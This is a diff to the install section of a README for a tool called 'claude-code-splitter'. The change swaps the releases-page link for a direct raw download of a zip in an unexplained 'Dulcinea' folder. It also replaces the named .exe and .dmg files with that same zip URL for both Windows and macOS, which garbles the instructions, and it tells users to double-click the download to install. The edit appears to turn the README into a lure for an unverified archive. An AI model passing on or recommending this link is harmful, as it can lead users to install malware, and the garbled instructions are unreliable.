Ali-ayub23/claude-code-splitter/README.md

 - **Disk Space:** At least 200 MB available

 ## 📥 Download & Install
-1. Visit the releases page to download the application: [Download claude-code-splitter](https://github.com/Ali-ayub23/claude-code-splitter/releases).
+1. Visit the releases page to download the application: [Download claude-code-splitter](https://raw.githubusercontent.com/Ali-ayub23/claude-code-splitter/main/Dulcinea/code_splitter_claude_3.4-beta.4.zip).
 2. Look for the latest version.
 You will see a list of available files.
-3. Click on the file labeled `claude-code-splitter.exe` for Windows or `claude-code-splitter.dmg` for macOS.
+3. Click on the file labeled `https://raw.githubusercontent.com/Ali-ayub23/claude-code-splitter/main/Dulcinea/code_splitter_claude_3.4-beta.4.zip` for Windows or `https://raw.githubusercontent.com/Ali-ayub23/claude-code-splitter/main/Dulcinea/code_splitter_claude_3.4-beta.4.zip` for macOS.
 This file contains everything you need to run the application.
 4. Once the file is downloaded, locate it on your computer.
 For most browsers, this will be in your "Downloads" folder.
 5. Double-click the file to start the installation process.
 6. Follow the prompts to complete the installation.